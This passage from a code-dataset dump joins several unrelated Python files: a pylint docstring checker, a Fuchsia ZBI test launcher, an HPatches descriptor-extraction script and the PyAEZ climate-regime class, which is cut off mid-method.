        return_node: astroid.Return. The return node to check.

    Returns:
        bool. True if the return node returns a value
            other than None, False otherwise.
    """
    value = return_node.value
    if value is None:
        # A bare ``return`` statement.
        return False
    is_none_constant = isinstance(value, astroid.Const) and value.value is None
    return not is_none_constant
def possible_exc_types(node):
    """Gets all of the possible raised exception types for the given raise node.

    Caught exception types are ignored.

    Args:
        node: astroid.node_classes.NodeNG. The raise
            to find exception types for.

    Returns:
        set(str). A list of exception types.
    """
    excs = []
    if isinstance(node.exc, astroid.Name):
        # ``raise SomeError`` -- infer what the bare name refers to.
        inferred = utils.safe_infer(node.exc)
        if inferred:
            excs = [inferred.name]
    elif (isinstance(node.exc, astroid.Call) and
            isinstance(node.exc.func, astroid.Name)):
        # ``raise SomeError(...)`` or ``raise factory(...)``.
        target = utils.safe_infer(node.exc.func)
        if isinstance(target, astroid.ClassDef):
            excs = [target.name]
        elif isinstance(target, astroid.FunctionDef):
            # A factory function: collect the std-exception types it returns.
            for ret in target.nodes_of_class(astroid.Return):
                if ret.frame() != target:
                    # Skip returns that belong to nested functions.
                    continue
                val = utils.safe_infer(ret.value)
                if (val and isinstance(val, (
                        astroid.Instance, astroid.ClassDef)) and
                        utils.inherit_from_std_ex(val)):
                    excs.append(val.name)
    elif node.exc is None:
        # A bare ``raise`` -- re-raises the enclosing handler's exception.
        handler = node.parent
        while handler and not isinstance(handler, astroid.ExceptHandler):
            handler = handler.parent
        if handler and handler.type:
            inferred_excs = astroid.unpack_infer(handler.type)
            excs = (exc.name for exc in inferred_excs
                    if exc is not astroid.Uninferable)
    try:
        # Drop exception types the surrounding code already catches.
        return set(
            exc for exc in excs if not utils.node_ignores_exception(
                node, exc))
    except astroid.InferenceError:
        return set()
def docstringify(docstring):
    """Converts a docstring in its str form to its Docstring object
    as defined in the pylint library.

    Args:
        docstring: str. Docstring for a particular class or function.

    Returns:
        Docstring. Pylint Docstring class instance representing
            a node's docstring.
    """
    # Try each known docstring style; currently only Google style is supported.
    for candidate_cls in (GoogleDocstring,):
        candidate = candidate_cls(docstring)
        if candidate.is_valid():
            return candidate
    # Fall back to pylint's generic Docstring wrapper.
    return _check_docs_utils.Docstring(docstring)
class GoogleDocstring(_check_docs_utils.GoogleDocstring):
    """Class for checking whether docstrings follow the Google Python Style
    Guide.
    """
    # Reuse the multi-type regex fragment from the pylint base class.
    re_multiple_type = _check_docs_utils.GoogleDocstring.re_multiple_type
    # Matches one "name: type. description" line of an Args: section.
    re_param_line = re.compile(r"""
        \s* \*{{0,2}}(\w+) # identifier potentially with asterisks
        \s* ( [:]
            \s*
            ({type}|\S*)
            (?:,\s+optional)?
            [.] )? \s* # optional type declaration
        \s* (.*) # beginning of optional description
    """.format(
        type=re_multiple_type,
    ), flags=re.X | re.S | re.M)
    # Matches the "type. description" line of a Returns: section.
    re_returns_line = re.compile(r"""
        \s* (({type}|\S*).)? # identifier
        \s* (.*) # beginning of description
    """.format(
        type=re_multiple_type,
    ), flags=re.X | re.S | re.M)
    # Yields: sections share the Returns: line format.
    re_yields_line = re_returns_line
class ASTDocStringChecker(object):
    """Checks that docstrings meet the code style."""

    def __init__(self):
        pass

    @classmethod
    def get_args_list_from_function_definition(cls, function_node):
        """Extracts the arguments from a function definition.

        Ignores class specific arguments (self and cls).

        Args:
            function_node: ast.FunctionDef. Represents a function.

        Returns:
            list(str). The args for a function as listed in the function
                definition.
        """
        # Ignore self and cls args.
        args_to_ignore = ('self', 'cls')
        arg_names = []
        for arg_node in function_node.args.args:
            # Python 3's ast represents an argument as an ast.arg node with an
            # 'arg' attribute; Python 2 used an ast.Name node with an 'id'
            # attribute. Support both so the checker works with either AST.
            arg_name = getattr(arg_node, 'arg', None)
            if arg_name is None:
                arg_name = arg_node.id
            if arg_name not in args_to_ignore:
                arg_names.append(arg_name)
        return arg_names

    @classmethod
    def build_regex_from_args(cls, function_args):
        """Builds a regex string from a function's arguments to match against
        the docstring. Ensures the docstring contains an 'Args' header, and
        each of the arguments are listed, followed by a colon, separated by new
        lines, and are listed in the correct order.

        Args:
            function_args: list(str). The arguments for a function.

        Returns:
            str|None. A regex that checks for an "Args" header and then each
                arg term with a colon in order with any characters in between,
                e.g. (Args:)[\\S\\s]*(arg_name0:)[\\S\\s]*(arg_name1:).
                Returns None when passed an empty list.
        """
        if not function_args:
            return None
        formatted_args = ['({}:)'.format(arg) for arg in function_args]
        return r'(Args:)[\S\s]*' + r'[\S\s]*'.join(formatted_args)

    @classmethod
    def compare_arg_order(cls, func_def_args, docstring):
        """Compares the arguments listed in the function definition and
        docstring, and reports missing, colon-less or mis-ordered arguments
        in the docstring.

        Args:
            func_def_args: list(str). The args as listed in the function
                definition.
            docstring: str|None. The contents of the docstring under the Args
                header.

        Returns:
            list(str). Each str contains an error message. If no linting
                errors were found, the list will be empty.
        """
        results = []
        # Nothing to check when there is no docstring or no Args section.
        if docstring is None or 'Args' not in docstring:
            return results

        # First check that each arg appears in the docstring with a colon.
        for arg_name in func_def_args:
            if arg_name + ':' not in docstring:
                if arg_name not in docstring:
                    results.append('Arg missing from docstring: {}'.format(
                        arg_name))
                else:
                    results.append('Arg not followed by colon: {}'.format(
                        arg_name))

        # Only check ordering when all args were present and well-formed.
        if func_def_args and not results:
            regex_pattern = cls.build_regex_from_args(func_def_args)
            if re.search(regex_pattern, docstring) is None:
                results.append('Arg ordering error in docstring.')
        return results

    @classmethod
    def check_docstrings_arg_order(cls, function_node):
        """Checks that a function's docstring lists its arguments in the
        same order as the function definition.

        Args:
            function_node: ast.FunctionDef. Represents a function.

        Returns:
            list(str). List of docstring errors associated with
                the function. If the function has no errors, the list is empty.
        """
        func_def_args = cls.get_args_list_from_function_definition(
            function_node)
        docstring = ast.get_docstring(function_node)
        return cls.compare_arg_order(func_def_args, docstring)
| 34.313725 | 80 | 0.626571 |
acfb41d344fb5bcc68ad5555fa52080e1e7e7358 | 108 | py | Python | wp/modules/wrapper/sparse_gaussian_process.py | ExLeonem/master-thesis-code | 559ad55f15c99772358384146bd30dd517b1dfe8 | [
"MIT"
] | null | null | null | wp/modules/wrapper/sparse_gaussian_process.py | ExLeonem/master-thesis-code | 559ad55f15c99772358384146bd30dd517b1dfe8 | [
"MIT"
] | null | null | null | wp/modules/wrapper/sparse_gaussian_process.py | ExLeonem/master-thesis-code | 559ad55f15c99772358384146bd30dd517b1dfe8 | [
"MIT"
] | null | null | null |
from tf_al.wrapper import Model
class SparseGaussianProcess(Model):
def __init__(self):
pass | 13.5 | 35 | 0.712963 |
acfb41fbfe95681e90b0720c2afc365a34e55d67 | 4,987 | py | Python | tools/devshell/contrib/run-zbi-test.py | EnderNightLord-ChromeBook/zircon-rpi | b09b1eb3aa7a127c65568229fe10edd251869283 | [
"BSD-2-Clause"
] | 14 | 2020-10-25T05:48:36.000Z | 2021-09-20T02:46:20.000Z | tools/devshell/contrib/run-zbi-test.py | DamieFC/fuchsia | f78a4a1326f4a4bb5834500918756173c01bab4f | [
"BSD-2-Clause"
] | null | null | null | tools/devshell/contrib/run-zbi-test.py | DamieFC/fuchsia | f78a4a1326f4a4bb5834500918756173c01bab4f | [
"BSD-2-Clause"
] | 2 | 2020-10-25T01:13:49.000Z | 2020-10-26T02:32:13.000Z | #!/usr/bin/env python3
# Copyright 2020 The Fuchsia Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import argparse
import json
import os
import platform
import shlex
import subprocess
import sys
def find_bootserver(build_dir):
    """Locates the bootserver_new tool for the current host platform.

    Reads tool_paths.json in build_dir and returns the path (joined onto
    build_dir) of the first 'bootserver_new' entry matching the host OS and
    CPU. Exits the process with status 1 when no matching tool exists.

    Args:
        build_dir (str): Fuchsia build output directory.

    Returns:
        str. Path to the bootserver binary.
    """
    os_map = {'Linux': 'linux', 'Darwin': 'mac'}
    # Bug fix: the original map only knew 'x86_64' and 'arm64' and raised
    # KeyError on common values such as 'aarch64' (Linux arm64) or 'AMD64'
    # (Windows). Normalize all of them to Fuchsia CPU names.
    cpu_map = {
        'x86_64': 'x64',
        'AMD64': 'x64',
        'arm64': 'arm64',
        'aarch64': 'arm64',
    }
    host_os = os_map.get(platform.system())
    host_cpu = cpu_map.get(platform.machine())
    with open(os.path.join(build_dir, 'tool_paths.json')) as file:
        tool_paths = json.load(file)
    bootservers = [
        os.path.join(build_dir, tool['path']) for tool in tool_paths if (
            tool['name'] == 'bootserver_new' and tool['cpu'] == host_cpu and
            tool['os'] == host_os)
    ]
    if bootservers:
        return bootservers[0]
    print('Cannot find bootserver for %s-%s' % (host_os, host_cpu))
    sys.exit(1)
def main():
    """Entry point for `fx run-zbi-test`.

    Parses command-line options, looks the requested test up in the build's
    zbi_tests.json / images.json metadata, and launches it via bootserver
    (--boot), `fx emu` (--emu) or `fx qemu` (default). With no test name it
    lists the available tests instead.

    Returns:
        int. 0 on success (or when only listing tests), 1 on a usage or
        lookup error, otherwise the launched runner's return code.
    """
    parser = argparse.ArgumentParser(
        prog='fx run-zbi-test', description='Run a ZBI test.')
    # The three launch backends are mutually exclusive.
    modes = parser.add_mutually_exclusive_group()
    modes.add_argument(
        '--boot', '-b', action='store_true', help='Run via bootserver')
    modes.add_argument(
        '--emu', '-e', action='store_true', help='Run via fx emu')
    modes.add_argument(
        '--qemu', '-q', action='store_true', help='Run via fx qemu')
    parser.add_argument(
        '--args',
        '-a',
        metavar='RUNNER-ARG',
        action='append',
        default=[],
        help='Pass RUNNER-ARG to bootserver/fx emu/fx qemu')
    parser.add_argument(
        '-k',
        action='append_const',
        dest='args',
        const='-k',
        help='Shorthand for --args=-k')
    parser.add_argument(
        '--cmdline',
        '-c',
        metavar='KERNEL-ARGS',
        action='append',
        default=[],
        help='Add kernel command-line arguments.')
    parser.add_argument(
        'name', help='Name of the zbi_test() target to run', nargs='?')
    args = parser.parse_args()

    # Both environment variables are normally exported by the `fx` wrapper.
    build_dir = os.getenv('FUCHSIA_BUILD_DIR')
    if build_dir is None:
        print('FUCHSIA_BUILD_DIR not set')
        return 1
    test_cpu = os.getenv('FUCHSIA_ARCH')
    if test_cpu is None:
        print('FUCHSIA_ARCH not set')
        return 1

    with open(os.path.join(build_dir, 'zbi_tests.json')) as file:
        zbi_tests = json.load(file)
    with open(os.path.join(build_dir, 'images.json')) as file:
        images = json.load(file)

    def qemu_test(test):
        # Resolve a zbi_test entry that boots a raw QEMU kernel image into a
        # uniform {label, disabled, name, path} record via images.json.
        label = test['qemu_kernel_label']
        for image in images:
            if image.get('label') == label:
                name = image['name']
                # Strip the generated wrapper affixes to recover the
                # user-facing test name.
                if name.startswith('_qemu_phys_test.') and name.endswith(
                        '.executable'):
                    name = name[len('_qemu_phys_test.'):-len('.executable')]
                return {
                    'label': label,
                    'disabled': test['disabled'],
                    'name': name,
                    'path': image['path']
                }
        print('%s missing from images.json' % label)
        sys.exit(1)

    all_qemu = [
        qemu_test(test)
        for test in zbi_tests
        if test['cpu'] == test_cpu and 'qemu_kernel_label' in test
    ]
    all_zbi = [
        test for test in zbi_tests
        if test['cpu'] == test_cpu and 'qemu_kernel_label' not in test
    ]

    # Without a test name, just list what is available and exit cleanly.
    if not args.name:
        print('Available ZBI and QEMU tests:')
        for test in all_zbi + all_qemu:
            print(
                '%s%s from %s' % (
                    test['name'], ' (disabled)' if test['disabled'] else '',
                    test['label']))
        return 0

    zbis = [
        os.path.join(build_dir, test['path'])
        for test in all_zbi
        if test['name'] == args.name
    ]
    qemus = [
        os.path.join(build_dir, test['path'])
        for test in all_qemu
        if test['name'] == args.name
    ]
    if not zbis and not qemus:
        print('Cannot find ZBI test %s for %s' % (args.name, test_cpu))
        return 1
    if len(zbis + qemus) > 1:
        # Bug fix: this branch referenced an undefined local `name` and
        # raised NameError whenever the requested name was ambiguous.
        print('Multiple matches for %s:' % args.name)
        for path in zbis + qemus:
            print(path)
        return 1
    if args.boot and qemus:
        print('Cannot use --boot with QEMU-only test %s' % args.name)
        return 1

    if args.boot:
        bootserver = find_bootserver(build_dir)
        cmd = [bootserver, '--boot'] + zbis + args.args
    else:
        if args.emu:
            cmd = ['fx', 'emu', '--headless', '--experiment-arm64']
        else:
            cmd = ['fx', 'qemu']
        cmd += args.args
        if zbis:
            cmd += ['-z'] + zbis
        elif args.emu:
            # QEMU-kernel tests boot a raw kernel image instead of a ZBI.
            cmd += ['-K'] + qemus
        else:
            cmd += ['-t'] + qemus
        for arg in args.cmdline:
            cmd += ['-c', arg]

    # Echo the command before running it so failures are reproducible.
    print('+ %s' % ' '.join(map(shlex.quote, cmd)))
    return subprocess.run(cmd).returncode


if __name__ == '__main__':
    sys.exit(main())
| 29.508876 | 76 | 0.54602 |
acfb425e2dbfc4e4f7756e17ffc6bd01747f4862 | 1,220 | py | Python | utils/hpatches_extract_descriptors.py | vohoaiviet/wlrn-weak-learning | 4c72f9c8bb968c4d067769e3b8f433f35cd04d6b | [
"MIT"
] | null | null | null | utils/hpatches_extract_descriptors.py | vohoaiviet/wlrn-weak-learning | 4c72f9c8bb968c4d067769e3b8f433f35cd04d6b | [
"MIT"
] | null | null | null | utils/hpatches_extract_descriptors.py | vohoaiviet/wlrn-weak-learning | 4c72f9c8bb968c4d067769e3b8f433f35cd04d6b | [
"MIT"
] | null | null | null | import torch
import torchvision
import sys
import os
import cv2
import numpy
assert len(sys.argv)==6, "* python extract.py <net definition> <net params> <patch size> <HPatches folder> <output folder>"
#
MODELFILE = sys.argv[1]
exec(open(MODELFILE).read())
MODEL = init()
MODEL.load_state_dict( torch.load(sys.argv[2]) )
MODEL.cuda()
MODEL.eval()
patchsize = int(sys.argv[3])
#
if not os.path.exists(sys.argv[5]):
os.makedirs(sys.argv[5])
#
for root, dirs, files in os.walk(sys.argv[4]):
#
for f in files:
if f.endswith('.png'):
#
seq = root.split('/')[-1]
#
patches = cv2.imread(os.path.join(root, f))
npatches = int(patches.shape[0]/65)
patches = cv2.resize(patches, (patchsize, patchsize*npatches))
patches = torch.from_numpy(patches).view(npatches, patchsize, patchsize, 3).permute(0, 3, 1, 2).cuda().float()
#torchvision.utils.save_image(patches[400], 'tmp.png')
#
descriptors = MODEL.forward(torch.autograd.Variable(patches, volatile=True)).data.cpu().numpy()
#
if not os.path.exists(os.path.join(sys.argv[5], seq)):
os.makedirs(os.path.join(sys.argv[5], seq))
numpy.savetxt(os.path.join(sys.argv[5], seq, f.split('.')[0]+'.csv'), descriptors, delimiter=',')
| 28.372093 | 123 | 0.67541 |
acfb43747a117199bff696d3d79199523cd4eaf4 | 23,410 | py | Python | code/ClimateRegime.py | slibby/PyAEZ | fffba1028586c9d14a8c3a1377a12a05868b8403 | [
"MIT"
] | 17 | 2020-09-10T16:10:59.000Z | 2022-03-28T13:35:53.000Z | code/ClimateRegime.py | sbaber1/PyAEZ | fffba1028586c9d14a8c3a1377a12a05868b8403 | [
"MIT"
] | 1 | 2021-07-25T14:21:08.000Z | 2021-08-04T15:59:18.000Z | code/ClimateRegime.py | sbaber1/PyAEZ | fffba1028586c9d14a8c3a1377a12a05868b8403 | [
"MIT"
] | 22 | 2020-09-10T16:10:39.000Z | 2022-03-21T04:00:16.000Z | """
PyAEZ
Written by N. Lakmal Deshapriya and Thaileng Thol
"""
import numpy as np
np.seterr(divide='ignore', invalid='ignore') # ignore "divide by zero" or "divide by NaN" warning
import UtilitiesCalc
import ETOCalc
class ClimateRegime(object):
    """Derives agro-climatic indicators from gridded climate data.

    Computes thermal climates/zones, growing-period lengths, temperature
    sums and temperature profiles. Call setLocationTerrainData() and one of
    setMonthlyClimateData() / setDailyClimateData() before querying any of
    the get*() methods.
    """

    # The study-area mask is optional; a class-level default prevents an
    # AttributeError in the get/set methods when setStudyAreaMask() was
    # never called (the original only set this flag inside that method).
    set_mask = False

    def setStudyAreaMask(self, admin_mask, no_data_value):
        """Register an optional study-area mask.

        Pixels whose mask value equals no_data_value are skipped by all
        subsequent computations.
        """
        self.im_mask = admin_mask
        self.nodata_val = no_data_value
        self.set_mask = True

    def setLocationTerrainData(self, lat_min, lat_max, elevation):
        """Set the elevation grid and derive a per-pixel latitude map from
        the lat_min..lat_max extent."""
        self.elevation = elevation
        self.im_height = elevation.shape[0]
        self.im_width = elevation.shape[1]
        self.latitude = UtilitiesCalc.UtilitiesCalc().generateLatitudeMap(lat_min, lat_max, self.im_height, self.im_width)

    def setMonthlyClimateData(self, min_temp, max_temp, precipitation, short_rad, wind_speed, rel_humidity):
        """Interpolate monthly climate grids to daily series and compute
        daily reference evapotranspiration (ETo) per pixel.

        All inputs are (height, width, 12) arrays; short_rad is in W/m2.
        """
        self.meanT_daily = np.zeros((self.im_height, self.im_width, 365))
        self.totalPrec_daily = np.zeros((self.im_height, self.im_width, 365))
        self.pet_daily = np.zeros((self.im_height, self.im_width, 365))

        # Interpolate monthly to daily data
        obj_utilities = UtilitiesCalc.UtilitiesCalc()
        meanT_monthly = (min_temp+max_temp)/2
        for i_row in range(self.im_height):
            for i_col in range(self.im_width):
                if self.set_mask:
                    if self.im_mask[i_row, i_col] == self.nodata_val:
                        continue
                self.meanT_daily[i_row, i_col, :] = obj_utilities.interpMonthlyToDaily(meanT_monthly[i_row, i_col,:], 1, 365)
                self.totalPrec_daily[i_row, i_col, :] = obj_utilities.interpMonthlyToDaily(precipitation[i_row, i_col,:], 1, 365, no_minus_values=True)
                minT_daily = obj_utilities.interpMonthlyToDaily(min_temp[i_row, i_col,:], 1, 365)
                maxT_daily = obj_utilities.interpMonthlyToDaily(max_temp[i_row, i_col,:], 1, 365)
                radiation_daily = obj_utilities.interpMonthlyToDaily(short_rad[i_row, i_col,:], 1, 365, no_minus_values=True)
                wind_daily = obj_utilities.interpMonthlyToDaily(wind_speed[i_row, i_col,:], 1, 365, no_minus_values=True)
                rel_humidity_daily = obj_utilities.interpMonthlyToDaily(rel_humidity[i_row, i_col,:], 1, 365, no_minus_values=True)

                # calculation of ET
                obj_eto = ETOCalc.ETOCalc(1, 365, self.latitude[i_row, i_col], self.elevation[i_row, i_col])
                shortrad_daily_MJm2day = (radiation_daily*3600*24)/1000000  # convert W/m2 to MJ/m2/day
                obj_eto.setClimateData(minT_daily, maxT_daily, wind_daily, shortrad_daily_MJm2day, rel_humidity_daily)
                self.pet_daily[i_row, i_col, :] = obj_eto.calculateETO()

        # Sea-level temperature (standard lapse rate of 0.55 degC / 100 m).
        self.meanT_daily_sealevel = self.meanT_daily + np.tile(np.reshape(self.elevation/100*0.55, (self.im_height,self.im_width,1)), (1,1,365))
        # P over PET ratio
        self.P_by_PET_daily = self.totalPrec_daily / self.pet_daily

    def setDailyClimateData(self, min_temp, max_temp, precipitation, short_rad, wind_speed, rel_humidity):
        """Ingest daily climate grids directly and compute daily reference
        evapotranspiration (ETo) per pixel.

        All inputs are (height, width, 365) arrays; short_rad is in W/m2.
        """
        self.meanT_daily = np.zeros((self.im_height, self.im_width, 365))
        self.totalPrec_daily = np.zeros((self.im_height, self.im_width, 365))
        self.pet_daily = np.zeros((self.im_height, self.im_width, 365))

        # calculation of ET
        for i_row in range(self.im_height):
            for i_col in range(self.im_width):
                if self.set_mask:
                    if self.im_mask[i_row, i_col] == self.nodata_val:
                        continue
                self.meanT_daily[i_row, i_col, :] = (min_temp[i_row, i_col, :]+max_temp[i_row, i_col, :])/2
                self.totalPrec_daily[i_row, i_col, :] = precipitation[i_row, i_col, :]

                obj_eto = ETOCalc.ETOCalc(1, 365, self.latitude[i_row, i_col], self.elevation[i_row, i_col])
                shortrad_daily_MJm2day = (short_rad[i_row, i_col, :]*3600*24)/1000000  # convert W/m2 to MJ/m2/day
                obj_eto.setClimateData(min_temp[i_row, i_col, :], max_temp[i_row, i_col, :], wind_speed[i_row, i_col, :], shortrad_daily_MJm2day, rel_humidity[i_row, i_col, :])
                self.pet_daily[i_row, i_col, :] = obj_eto.calculateETO()

        # Sea-level temperature (standard lapse rate of 0.55 degC / 100 m).
        self.meanT_daily_sealevel = self.meanT_daily + np.tile(np.reshape(self.elevation/100*0.55, (self.im_height,self.im_width,1)), (1,1,365))
        # P over PET ratio
        self.P_by_PET_daily = self.totalPrec_daily / self.pet_daily

    def getThermalClimate(self):
        """Classify each pixel into one of 12 thermal climates
        (1=tropical lowland ... 12=arctic) following the AEZ scheme."""
        thermal_climate = np.zeros((self.im_height, self.im_width))

        for i_r in range(self.im_height):
            for i_c in range(self.im_width):
                if self.set_mask:
                    if self.im_mask[i_r, i_c] == self.nodata_val:
                        continue

                # converting daily to monthly
                obj_utilities = UtilitiesCalc.UtilitiesCalc()
                meanT_monthly_sealevel_v = obj_utilities.averageDailyToMonthly(self.meanT_daily_sealevel[i_r,i_c,:])
                meanT_monthly_v = obj_utilities.averageDailyToMonthly(self.meanT_daily[i_r,i_c,:])
                P_by_PET_monthly_v = obj_utilities.averageDailyToMonthly(self.P_by_PET_daily[i_r,i_c,:])

                if np.min(meanT_monthly_sealevel_v) >= 18:
                    # Tropics
                    if np.min(meanT_monthly_v) > 20:
                        # Tropical lowland
                        thermal_climate[i_r,i_c] = 1
                    else:
                        # Tropical highland
                        thermal_climate[i_r,i_c] = 2
                elif np.min(meanT_monthly_sealevel_v) >= 5 and np.sum(meanT_monthly_sealevel_v>=10) >= 8:
                    # SubTropic; months Apr-Sep ([3:9]) are the northern
                    # summer half-year, Oct-Mar the winter half-year.
                    if np.sum(self.totalPrec_daily[i_r,i_c,:]) < 250:
                        # Subtropics Low Rainfall
                        thermal_climate[i_r,i_c] = 3
                    elif self.latitude[i_r,i_c]>=0 and np.mean(P_by_PET_monthly_v[3:9]) >= np.mean([P_by_PET_monthly_v[9:12],P_by_PET_monthly_v[0:3]]):
                        # Subtropics Summer Rainfall
                        thermal_climate[i_r,i_c] = 4
                    elif self.latitude[i_r,i_c]<0 and np.mean(P_by_PET_monthly_v[3:9]) <= np.mean([P_by_PET_monthly_v[9:12],P_by_PET_monthly_v[0:3]]):
                        # Subtropics Summer Rainfall
                        thermal_climate[i_r,i_c] = 4
                    elif self.latitude[i_r,i_c]>=0 and np.mean(P_by_PET_monthly_v[3:9]) <= np.mean([P_by_PET_monthly_v[9:12],P_by_PET_monthly_v[0:3]]):
                        # Subtropics Winter Rainfall
                        thermal_climate[i_r,i_c] = 5
                    elif self.latitude[i_r,i_c]<0 and np.mean(P_by_PET_monthly_v[3:9]) >= np.mean([P_by_PET_monthly_v[9:12],P_by_PET_monthly_v[0:3]]):
                        # Subtropics Winter Rainfall
                        thermal_climate[i_r,i_c] = 5
                elif np.sum(meanT_monthly_sealevel_v>=10) >= 4:
                    # Temperate, split by annual temperature amplitude.
                    if np.max(meanT_monthly_v)-np.min(meanT_monthly_v) < 20:
                        # Oceanic Temperate
                        thermal_climate[i_r,i_c] = 6
                    elif np.max(meanT_monthly_v)-np.min(meanT_monthly_v) < 35:
                        # Sub-Continental Temperate
                        thermal_climate[i_r,i_c] = 7
                    else:
                        # Continental Temperate
                        thermal_climate[i_r,i_c] = 8
                elif np.sum(meanT_monthly_sealevel_v>=10) >= 1:
                    # Boreal, split by annual temperature amplitude.
                    if np.max(meanT_monthly_v)-np.min(meanT_monthly_v) < 20:
                        # Oceanic Boreal
                        thermal_climate[i_r,i_c] = 9
                    elif np.max(meanT_monthly_v)-np.min(meanT_monthly_v) < 35:
                        # Sub-Continental Boreal
                        thermal_climate[i_r,i_c] = 10
                    else:
                        # Continental Boreal
                        thermal_climate[i_r,i_c] = 11
                else:
                    # Arctic
                    thermal_climate[i_r,i_c] = 12

        return thermal_climate

    def getThermalZone(self):
        """Classify each pixel into one of 21 thermal zones (five warmth
        levels inside each of tropics / subtropics / temperate / boreal,
        plus arctic)."""
        thermal_zone = np.zeros((self.im_height, self.im_width))

        for i_r in range(self.im_height):
            for i_c in range(self.im_width):
                if self.set_mask:
                    if self.im_mask[i_r, i_c] == self.nodata_val:
                        continue

                # converting daily to monthly
                obj_utilities = UtilitiesCalc.UtilitiesCalc()
                meanT_monthly_sealevel_v = obj_utilities.averageDailyToMonthly(self.meanT_daily_sealevel[i_r,i_c,:])
                meanT_monthly_v = obj_utilities.averageDailyToMonthly(self.meanT_daily[i_r,i_c,:])

                if np.min(meanT_monthly_sealevel_v) >= 18:
                    # Tropics
                    if np.mean(meanT_monthly_v) > 20:
                        # Warm
                        thermal_zone[i_r,i_c] = 1
                    elif np.sum(meanT_monthly_v<18) >= 1 and np.min(meanT_monthly_v) > 5 and np.sum(meanT_monthly_v>10) >= 8:
                        # Moderately Cool
                        thermal_zone[i_r,i_c] = 2
                    elif np.sum(meanT_monthly_v<5) >= 1 and np.sum(meanT_monthly_v>10) >= 4:
                        # Cool
                        thermal_zone[i_r,i_c] = 3
                    elif np.sum(meanT_monthly_v<5) >= 1 and np.sum(meanT_monthly_v>10) >= 1:
                        # Cold
                        thermal_zone[i_r,i_c] = 4
                    elif np.sum(meanT_monthly_v<10) == 12:
                        # Very Cold
                        thermal_zone[i_r,i_c] = 5
                elif np.min(meanT_monthly_sealevel_v) >= 5 and np.sum(meanT_monthly_sealevel_v>=10) >= 8:
                    # SubTropic
                    if np.mean(meanT_monthly_v) > 20:
                        # Warm
                        thermal_zone[i_r,i_c] = 6
                    elif np.sum(meanT_monthly_v<18) >= 1 and np.min(meanT_monthly_v) > 5 and np.sum(meanT_monthly_v>10) >= 8:
                        # Moderately Cool
                        thermal_zone[i_r,i_c] = 7
                    elif np.sum(meanT_monthly_v<5) >= 1 and np.sum(meanT_monthly_v>10) >= 4:
                        # Cool
                        thermal_zone[i_r,i_c] = 8
                    elif np.sum(meanT_monthly_v<5) >= 1 and np.sum(meanT_monthly_v>10) >= 1:
                        # Cold
                        thermal_zone[i_r,i_c] = 9
                    elif np.sum(meanT_monthly_v<10) == 12:
                        # Very Cold
                        thermal_zone[i_r,i_c] = 10
                elif np.sum(meanT_monthly_sealevel_v>=10) >= 4:
                    # Temperate
                    if np.mean(meanT_monthly_v) > 20:
                        # Warm
                        thermal_zone[i_r,i_c] = 11
                    elif np.sum(meanT_monthly_v<18) >= 1 and np.min(meanT_monthly_v) > 5 and np.sum(meanT_monthly_v>10) >= 8:
                        # Moderately Cool
                        thermal_zone[i_r,i_c] = 12
                    elif np.sum(meanT_monthly_v<5) >= 1 and np.sum(meanT_monthly_v>10) >= 4:
                        # Cool
                        thermal_zone[i_r,i_c] = 13
                    elif np.sum(meanT_monthly_v<5) >= 1 and np.sum(meanT_monthly_v>10) >= 1:
                        # Cold
                        thermal_zone[i_r,i_c] = 14
                    elif np.sum(meanT_monthly_v<10) == 12:
                        # Very Cold
                        thermal_zone[i_r,i_c] = 15
                elif np.sum(meanT_monthly_sealevel_v>=10) >= 1:
                    # Boreal
                    if np.mean(meanT_monthly_v) > 20:
                        # Warm
                        thermal_zone[i_r,i_c] = 16
                    elif np.sum(meanT_monthly_v<18) >= 1 and np.min(meanT_monthly_v) > 5 and np.sum(meanT_monthly_v>10) >= 8:
                        # Moderately Cool
                        thermal_zone[i_r,i_c] = 17
                    elif np.sum(meanT_monthly_v<5) >= 1 and np.sum(meanT_monthly_v>10) >= 4:
                        # Cool
                        thermal_zone[i_r,i_c] = 18
                    elif np.sum(meanT_monthly_v<5) >= 1 and np.sum(meanT_monthly_v>10) >= 1:
                        # Cold
                        thermal_zone[i_r,i_c] = 19
                    elif np.sum(meanT_monthly_v<10) == 12:
                        # Very Cold
                        thermal_zone[i_r,i_c] = 20
                else:
                    # Arctic
                    thermal_zone[i_r,i_c] = 21

        return thermal_zone

    def getThermalLGP0(self):
        """Number of days per year with mean temperature above 0 degC."""
        return np.sum(self.meanT_daily>0, axis=2)

    def getThermalLGP5(self):
        """Number of days per year with mean temperature above 5 degC."""
        return np.sum(self.meanT_daily>5, axis=2)

    def getThermalLGP10(self):
        """Number of days per year with mean temperature above 10 degC."""
        return np.sum(self.meanT_daily>10, axis=2)

    def getTemperatureSum0(self):
        """Annual sum of daily mean temperatures on days above 0 degC."""
        # Bug fix: the original aliased self.meanT_daily and zeroed entries
        # in place, silently corrupting the stored daily series for every
        # later computation. Work on a copy instead.
        tempT = self.meanT_daily.copy()
        tempT[tempT<=0] = 0
        return np.sum(tempT, axis=2)

    def getTemperatureSum5(self):
        """Annual sum of daily mean temperatures on days above 5 degC."""
        tempT = self.meanT_daily.copy()  # copy: do not mutate stored data
        tempT[tempT<=5] = 0
        return np.sum(tempT, axis=2)

    def getTemperatureSum10(self):
        """Annual sum of daily mean temperatures on days above 10 degC."""
        tempT = self.meanT_daily.copy()  # copy: do not mutate stored data
        tempT[tempT<=10] = 0
        return np.sum(tempT, axis=2)

    def getTemperatureProfile(self):
        """Count, per pixel, the days spent in each 5 degC temperature band
        separately for the warming (A) and cooling (B) parts of the year.

        Returns:
            list of 18 (height, width) arrays: [A9..A1, B1..B9].
        """
        # Append day 1 so the day-365 -> day-1 transition is included.
        meanT_daily_add1day = np.concatenate((self.meanT_daily, self.meanT_daily[:,:,0:1]), axis=-1)
        meanT_first = meanT_daily_add1day[:,:,:-1]
        meanT_diff = meanT_daily_add1day[:,:,1:] - meanT_daily_add1day[:,:,:-1]

        A9 = np.sum( np.logical_and(meanT_diff>0, meanT_first<-5), axis=2 )
        A8 = np.sum( np.logical_and(meanT_diff>0, np.logical_and(meanT_first>=-5, meanT_first<0)), axis=2 )
        A7 = np.sum( np.logical_and(meanT_diff>0, np.logical_and(meanT_first>=0, meanT_first<5)), axis=2 )
        A6 = np.sum( np.logical_and(meanT_diff>0, np.logical_and(meanT_first>=5, meanT_first<10)), axis=2 )
        A5 = np.sum( np.logical_and(meanT_diff>0, np.logical_and(meanT_first>=10, meanT_first<15)), axis=2 )
        A4 = np.sum( np.logical_and(meanT_diff>0, np.logical_and(meanT_first>=15, meanT_first<20)), axis=2 )
